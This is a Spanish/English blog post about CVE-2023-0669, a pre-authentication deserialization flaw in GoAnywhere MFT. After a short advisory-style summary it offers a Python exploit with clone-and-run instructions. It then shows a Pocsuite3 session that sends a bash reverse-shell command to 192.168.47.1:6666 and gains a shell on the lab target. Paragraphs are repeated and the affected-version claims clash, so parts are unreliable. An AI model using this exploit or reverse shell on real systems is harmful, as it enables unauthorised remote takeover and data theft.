
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Deserialización Python RCE PoC(Prueba de Concepto)
CVE-2023-0669 GoAnywhere MFT Deserialización - Blog de Je Yiuwai
CVE-2023-0669 es una vulnerabilidad de deserialización en GoAnywhere MFT que, debido a la deserialización de un objeto controlado por un atacante arbitrario, existe una vulnerabilidad de inyección de comandos pre-autenticada en License Response Servlet. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código arbitrario en el sistema afectado, lo que lleva a un control total del sistema. Esta vulnerabilidad afecta a versiones anteriores a 7.1.2, sin incluir 7.1.2.
CVE-2023-0669 es una vulnerabilidad de deserialización de GoAnywhere MFT que existe en el License Response Servlet debido a una vulnerabilidad de inyección de comandos pre-autenticada que permite a un atacante ejecutar código arbitrario en el sistema afectado mediante la deserialización de un objeto controlado por el atacante. La vulnerabilidad afecta a versiones anteriores a 7.1.2.
Esta vulnerabilidad puede representar una grave amenaza para la seguridad del software de transferencia de archivos de nivel empresarial GoAnywhere MFT. Los atacantes pueden explotarla para robar datos confidenciales, alterar datos, comprometer sistemas, etc. Por lo tanto, los usuarios deben tomar medidas de manera oportuna para proteger la seguridad del sistema.
La vulnerabilidad representa una grave amenaza para la seguridad del software de transferencia de archivos de nivel empresarial GoAnywhere MFT, ya que los atacantes pueden explotarla para robar datos confidenciales, alterar datos y comprometer sistemas. Por lo tanto, los usuarios deben tomar medidas de manera oportuna para proteger sus sistemas.
El aviso de seguridad oficial ha sido publicado y se han proporcionado métodos de inspección preliminares. Los usuarios pueden verificar si sus sistemas están afectados por esta vulnerabilidad buscando cadenas específicas en el registro userdata/logs. Si no se pueden aplicar parches, se recomienda tomar otras medidas de seguridad para proteger el sistema.
El aviso de seguridad oficial ha sido publicado y se han proporcionado métodos de inspección preliminares. Los usuarios pueden verificar si sus sistemas están afectados por la vulnerabilidad buscando cadenas específicas en el registro userdata/logs. Si no se pueden aplicar parches, se recomienda tomar otras medidas de seguridad para proteger el sistema.
En resumen, CVE-2023-0669 es una vulnerabilidad de deserialización que requiere la atención de los usuarios. Los usuarios deben actualizar a la última versión de manera oportuna y verificar si sus sistemas están afectados por esta vulnerabilidad. Además, se recomienda que los usuarios fortalezcan la gestión de seguridad del software de nivel empresarial como GoAnywhere MFT y tomen medidas de seguridad en múltiples niveles para proteger sus sistemas.
En resumen, CVE-2023-0669 es una vulnerabilidad de deserialización que requiere la atención de los usuarios. Los usuarios deben actualizar a la última versión de manera oportuna y verificar si sus sistemas están afectados por la vulnerabilidad. Además, se recomienda que los usuarios refuercen la gestión de seguridad del software de nivel empresarial como GoAnywhere MFT y tomen medidas de seguridad en múltiples capas para proteger sus sistemas.
Este Exploit es un script basado en Python utilizado para explotar la vulnerabilidad CVE-2023-0669 en GoAnywhere MFT v6.7.9594 y versiones anteriores.
This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.
Esta vulnerabilidad existe debido a un problema de seguridad en el procesamiento de solicitudes Bundle cifradas en GoAnywhere MFT. Un atacante puede enviar una solicitud especialmente diseñada para ejecutar código arbitrario en el servidor objetivo.
This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <IP del servidor objetivo>
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <target IP>
La ejecución de este Exploit requiere derechos de acceso legales y no debe utilizarse con fines ilegales. Dado que la ejecución de este Exploit representa un riesgo para el servidor objetivo, el usuario es el único responsable de sus riesgos y consecuencias.
Running this Exploit requires legal access rights and should not be used for illegal purposes. As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Autor: Je Yiuwai editado por xiaomi pad 6 pro